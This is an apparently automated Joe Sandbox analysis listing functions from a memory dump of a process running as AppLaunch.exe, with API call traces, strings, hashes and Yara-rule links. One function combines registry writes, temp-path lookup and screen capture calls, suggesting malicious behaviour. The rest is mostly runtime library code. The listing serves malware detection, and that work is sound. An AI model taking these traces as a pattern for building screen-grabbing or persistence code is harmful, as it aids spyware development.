Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
API String ID: 0-448403072
Opcode ID: 57d106498db7899f3aa41c76d77319a9238ae015fec6294a597a1f848f499a36
Instruction ID: f9aceea7537a5da28f8af463aa3b3036826302d02d300322d48023da3746b8b8
Opcode Fuzzy Hash: 57d106498db7899f3aa41c76d77319a9238ae015fec6294a597a1f848f499a36
Instruction Fuzzy Hash: F621C87560010ABFEB20AF638C80DEB776CEF503A8751451AFD25D7281EB38EC919769

Uniqueness

Uniqueness Score: -1.00%

Function 00414324 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00414374

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: c8935d85e1b31c46e1a1174e1707af6fd839fca0fb0ccfeeb0e85a842d495f94
Instruction ID: ed88c8b2834a223bdf14af572603c0d18472ff94cd2ee3cbde75d3667026c296
Opcode Fuzzy Hash: c8935d85e1b31c46e1a1174e1707af6fd839fca0fb0ccfeeb0e85a842d495f94
Instruction Fuzzy Hash: 1A110B31B01629ABC7314B64DC407DF3768DF857A0B250122ED25E7390D738ED8185DC

Uniqueness

Uniqueness Score: -1.00%

Function 004153D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004153C8,?,?,00415390,?,?,?), ref: 004153E8
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004153FB
FreeLibrary.KERNEL32(00000000,?,?,004153C8,?,?,00415390,?,?,?), ref: 0041541E

Strings

CorExitProcess, xrefs: 004153F3
mscoree.dll, xrefs: 004153E1

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a9535ac66a763b308a31d4138c8bb1f9763dc39b12a82d4f91f4d3e5fd0fedcd
Instruction ID: 23f74303fc49eebe3cd52a59286832f74df74654cc3a6b5ebb9ff97ddc71e371
Opcode Fuzzy Hash: a9535ac66a763b308a31d4138c8bb1f9763dc39b12a82d4f91f4d3e5fd0fedcd
Instruction Fuzzy Hash: 4AF08230700629FBDB219B50ED0EBDEBB74EB44756F544075E400E1160CB788E41DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 00411240 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00412070: Concurrency::cancel_current_task.LIBCPMT ref: 00412124

Part of subcall function 00402150: RegOpenKeyExA.ADVAPI32(?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023C1
Part of subcall function 00402150: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023E9
Part of subcall function 00402150: RegCloseKey.ADVAPI32(?,?,00000400,00000000,00000001,?,?,?,00000001), ref: 004023F2

Part of subcall function 00402150: RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 004024D9
Part of subcall function 00402150: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000001,?,?), ref: 00402507
Part of subcall function 00402150: RegCloseKey.ADVAPI32(80000001), ref: 00402510

Part of subcall function 004058C0: GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 004059EF

Part of subcall function 00402150: GdiplusStartup.GDIPLUS(?,?,00000000,?,?,?), ref: 0040261B
Part of subcall function 00402150: GetDC.USER32(00000000), ref: 00402702

Part of subcall function 00402150: RegGetValueA.ADVAPI32(80000002,?,00000000,00000018,00000000,?,00000004), ref: 00402934
Part of subcall function 00402150: GetSystemMetrics.USER32 ref: 00402977
Part of subcall function 00402150: GetSystemMetrics.USER32 ref: 00402984

Sleep.KERNEL32(0000EA60), ref: 00411511
Sleep.KERNEL32(0000EA60), ref: 00411573

Strings

LC, xrefs: 004113EF
LC, xrefs: 00411398
LC, xrefs: 00411342

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Value$CloseMetricsOpenSleepSystem$Concurrency::cancel_current_taskGdiplusPathQueryStartupTemp
String ID: LC$LC$LC
API String ID: 831712969-2682578208
Opcode ID: 41927932a8fa06c6ee7e72b337ba15a2882765349cc03e55e62595d0afb17401
Instruction ID: e9469f0f1e0da6fe2dc0e8ea04e20df7b24d509912d80d10ffce1298b6795629
Opcode Fuzzy Hash: 41927932a8fa06c6ee7e72b337ba15a2882765349cc03e55e62595d0afb17401
Instruction Fuzzy Hash: 0371297170030067C514F776CE47ADE7A56ABC9344F400A2EF986472D2EEBCA69486EF

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9D6 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041F9EE

Part of subcall function 004197D1: HeapFree.KERNEL32(00000000,00000000,?,004188F1), ref: 004197E7
Part of subcall function 004197D1: GetLastError.KERNEL32(?,?,004188F1), ref: 004197F9

_free.LIBCMT ref: 0041FA00
_free.LIBCMT ref: 0041FA12
_free.LIBCMT ref: 0041FA24
_free.LIBCMT ref: 0041FA36

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 46855c866c5351ef53163e36c4815a402b49584b15205537fa47138348ff7922
Instruction ID: 55d8c1c312ccc6df442b1b98d7c33def846be27a355c33498b5175c58c7c1ddd
Opcode Fuzzy Hash: 46855c866c5351ef53163e36c4815a402b49584b15205537fa47138348ff7922
Instruction Fuzzy Hash: 1CF03C32514240AB8628FB59F9C5CD677D9BE44754768082BF018D7E41CB2CFCC24A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0A3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E23D

Strings

*?, xrefs: 0041E0E6

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 0665bafb298977a9b8ef8d1ddf0b123d019091dca63f8e412db6d77415ba965e
Instruction ID: 5e425355c12d974568bb548033aa60d16b1c26af46b0fccae62f2204a7509920
Opcode Fuzzy Hash: 0665bafb298977a9b8ef8d1ddf0b123d019091dca63f8e412db6d77415ba965e
Instruction Fuzzy Hash: 3E614275D00219AFCB14CFA9C8815EEFBF5FF48714B2441AAE815E7340D6759E818B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041A815 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32("YA,?,00415922,?,?,?,761B6490), ref: 0041A81D
GetLastError.KERNEL32(?,00415922,?,?,?,761B6490), ref: 0041A827
__dosmaperr.LIBCMT ref: 0041A82E

Strings

"YA, xrefs: 0041A81A

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID: "YA
API String ID: 1545401867-2922044551
Opcode ID: 30fdd2c409c4bad255c4f159128a497a02e132b4c39620862fbdc9ada95b35ad
Instruction ID: 8e075638032bcf6d74262af286868be27c0c82466ee7119c10b6ee37084d7c44
Opcode Fuzzy Hash: 30fdd2c409c4bad255c4f159128a497a02e132b4c39620862fbdc9ada95b35ad
Instruction Fuzzy Hash: 4DD01232205108678F102FF7BC0886B3B5CDF813B53540626F53CC51A1DF39C8A29599

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9DA Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0041CA61

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 083e7ac672d413b3132a7ef9e23e68b64ed8632ad3dbf16e661d02b029cd5583
Instruction ID: 9620395ee9e12497a63a361969e3660bae85d4d778e8df5e26e7870268c703a9
Opcode Fuzzy Hash: 083e7ac672d413b3132a7ef9e23e68b64ed8632ad3dbf16e661d02b029cd5583
Instruction Fuzzy Hash: 29B11232A442559FDB11CF68CCC27EEBBA5EF45340F1440ABE855DB341E2389D82CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042482E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004248FE
_free.LIBCMT ref: 00424927
SetEndOfFile.KERNEL32(00000000,00420D15,00000000,0041966E,?,?,?,?,?,?,?,00420D15,0041966E,00000000), ref: 00424959
GetLastError.KERNEL32(?,?,?,?,?,?,?,00420D15,0041966E,00000000,?,?,?,?,00000000), ref: 00424975

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 0d2d9d757cf6aed2bdd106ecb705ab1b764b673a3646ffda88b220e1af19787a
Instruction ID: 0f261516778d2096c749c3491e82d0972e6ef1b7a1d3217b1bc2d7bd17767fe9
Opcode Fuzzy Hash: 0d2d9d757cf6aed2bdd106ecb705ab1b764b673a3646ffda88b220e1af19787a
Instruction Fuzzy Hash: FF4109B27002649ADB11ABB9DC02B9F77B5EF84364F65011BF924E7291E77CC8808728

Uniqueness

Uniqueness Score: -1.00%

Function 0041DFD4 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00415857: _free.LIBCMT ref: 00415865

Part of subcall function 0041EFAB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,004243A0,?,00000000,00000000), ref: 0041F04D

GetLastError.KERNEL32 ref: 0041E03C
__dosmaperr.LIBCMT ref: 0041E043
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041E082
__dosmaperr.LIBCMT ref: 0041E089

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: ac9a91d088df7ad3c6297044535d68f775ea6ecc37c2bc8585d32e8d52ebe420
Instruction ID: bad5de3afdbab7419ed868d74ac9601967bcef00b3555543ad58ec50f7c269c1
Opcode Fuzzy Hash: ac9a91d088df7ad3c6297044535d68f775ea6ecc37c2bc8585d32e8d52ebe420
Instruction Fuzzy Hash: FD21F975600219AF9B206F638C809EBBBADEF48368700451EFE2987241DB78DCC19764

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0C2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004157D5,?,?,?,?,00416442,?), ref: 0041A0C7
_free.LIBCMT ref: 0041A124
_free.LIBCMT ref: 0041A15A
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,004157D5,?,?,?,?,00416442,?), ref: 0041A165

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 1229307545459ea8145b8442967844ccb04685c5202c0af5c1f8958671a179fa
Instruction ID: d3c397e29b4898678e00c072fdae1153a4e8fcaebafeee38e52bad19040b405a
Opcode Fuzzy Hash: 1229307545459ea8145b8442967844ccb04685c5202c0af5c1f8958671a179fa
Instruction Fuzzy Hash: B011E732302201AA96102AB55CC59EB255A9BC5378F2A413BF228962D1FE6D8CE7412E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A219 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004163DC,004197F7,?,?,004188F1), ref: 0041A21E
_free.LIBCMT ref: 0041A27B
_free.LIBCMT ref: 0041A2B1
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,004163DC,004197F7,?,?,004188F1), ref: 0041A2BC

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b0e27a0edda7edbf14f0382f119cbe8d66f6f371dfed80e8716c648d85c20c1b
Instruction ID: 63a088f93977ff4232b5ee2fa60897efe122cd2ca353554d96c00f597a248294
Opcode Fuzzy Hash: b0e27a0edda7edbf14f0382f119cbe8d66f6f371dfed80e8716c648d85c20c1b
Instruction Fuzzy Hash: 1A11E9323025016AD6112675ACC19EB215A9FC1378B2A017BF238863D1FF3E9CF7412E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A975 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041AA71,00000000,?,00421360,00000000,00000000,0041AA71,?,?,00000000,00000000,00000001), ref: 0041A98B
GetLastError.KERNEL32(?,00421360,00000000,00000000,0041AA71,?,?,00000000,00000000,00000001,00000000,00000000,?,0041AA71,00000000,00000104), ref: 0041A995
__dosmaperr.LIBCMT ref: 0041A99C

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: b30198ee55c8f58e1c523fe8a5f3f81ee2b3d097f0754e1d9721cecd51747ce4
Instruction ID: 67408b9c56af1e9e3b55c33259d7aed4586a1093df18e063c47774dc333a864d
Opcode Fuzzy Hash: b30198ee55c8f58e1c523fe8a5f3f81ee2b3d097f0754e1d9721cecd51747ce4
Instruction Fuzzy Hash: 7EF06D72201115BBCB211BA2DC08D9BBFA9EF443A03168926B91CC6520CB39E8F1D7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A90C Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041AA71,00000000,?,004213D5,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0041A922
GetLastError.KERNEL32(?,004213D5,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0041AA71,00000000,00000104,?), ref: 0041A92C
__dosmaperr.LIBCMT ref: 0041A933

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 4e3ef60bf99aa9c8dc574cbeac2ebf4faaa1304fdc1414aef9f4919b6bb13d01
Instruction ID: 894c6f99f00fcf9e4f20ce7b33afa91ddcee0cc65c0a7edee271e323af5a41ba
Opcode Fuzzy Hash: 4e3ef60bf99aa9c8dc574cbeac2ebf4faaa1304fdc1414aef9f4919b6bb13d01
Instruction Fuzzy Hash: 12F08172201115BB8B211BA2DC08DABFFA9FF443A03464926F62DD6120DB35E8F1D7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00424D55 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(004053F0,00000000,00432C68,00000000,004053F0,?,0042219F,004053F0,00000001,004053F0,004053F0,?,0041B9FC,00000000,?,004053F0), ref: 00424D6C
GetLastError.KERNEL32(?,0042219F,004053F0,00000001,004053F0,004053F0,?,0041B9FC,00000000,?,004053F0,00000000,004053F0,?,0041BF50,004053F0), ref: 00424D78

Part of subcall function 00424D3E: CloseHandle.KERNEL32(FFFFFFFE,00424D88,?,0042219F,004053F0,00000001,004053F0,004053F0,?,0041B9FC,00000000,?,004053F0,00000000,004053F0), ref: 00424D4E

___initconout.LIBCMT ref: 00424D88

Part of subcall function 00424D00: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00424D2F,0042218C,004053F0,?,0041B9FC,00000000,?,004053F0,00000000), ref: 00424D13

WriteConsoleW.KERNEL32(004053F0,00000000,00432C68,00000000,?,0042219F,004053F0,00000001,004053F0,004053F0,?,0041B9FC,00000000,?,004053F0,00000000), ref: 00424D9D

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e6ed42e9dcef8d0bdb4e0254b1a8b2f08fb405fd5705a56b80d057d723c09720
Instruction ID: e72ba080592b69d8bdb2598ea6e3dbbb09e221423feeb610223fbcdc20f528a7
Opcode Fuzzy Hash: e6ed42e9dcef8d0bdb4e0254b1a8b2f08fb405fd5705a56b80d057d723c09720
Instruction Fuzzy Hash: C5F01C36210224BBCF221FA1FC04A8F7F26EF897A0B954025FA6885170D73699209B98

Uniqueness

Uniqueness Score: -1.00%

Function 00418A2F Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00418A38

Part of subcall function 004197D1: HeapFree.KERNEL32(00000000,00000000,?,004188F1), ref: 004197E7
Part of subcall function 004197D1: GetLastError.KERNEL32(?,?,004188F1), ref: 004197F9

_free.LIBCMT ref: 00418A4B
_free.LIBCMT ref: 00418A5C
_free.LIBCMT ref: 00418A6D

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9acdbd920adba65c76876f41f827beacdfaebc5141fecd10a79f6dcd22e9f832
Instruction ID: cdee1fedf35c5adb3dbe72967fc13678c506c91b1062e63496eb77d44ff44c68
Opcode Fuzzy Hash: 9acdbd920adba65c76876f41f827beacdfaebc5141fecd10a79f6dcd22e9f832
Instruction Fuzzy Hash: 47E08C70820D60DB8B027F22BC8188D7EA5FF08714364202FF42002AB5C73918929F8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED49 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0041E8DE: GetOEMCP.KERNEL32(00000000,0041EB50,?,?,BdA,00416442,?), ref: 0041E909

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,BdA,0041EB97,?,00000000,?,?,?,?,?,?,00416442), ref: 0041EDA7
GetCPInfo.KERNEL32(00000000,0041EB97,?,BdA,0041EB97,?,00000000,?,?,?,?,?,?,00416442,?), ref: 0041EDE9

Strings

BdA, xrefs: 0041ED4B

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: BdA
API String ID: 546120528-2350210841
Opcode ID: 549c5f8514ec9fdaaceff0aefc6bfcf3a7793426e157da9cd553846999f8db9f
Instruction ID: 74fb6c3509f3d8b7149d03fbfbd358b4cbcff78a11e884dee8f19f371720f225
Opcode Fuzzy Hash: 549c5f8514ec9fdaaceff0aefc6bfcf3a7793426e157da9cd553846999f8db9f
Instruction Fuzzy Hash: C7511378A003459EDB208F27C4416FBBBF5EF91304F14446FD89687291E778E986CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004034E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

<, xrefs: 00403609
@, xrefs: 00403611

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID:
String ID: <$@
API String ID: 0-1426351568
Opcode ID: 730a98a230b4d25041984cbc0c32c23882f73a2a52a4b1677c66f46a91612def
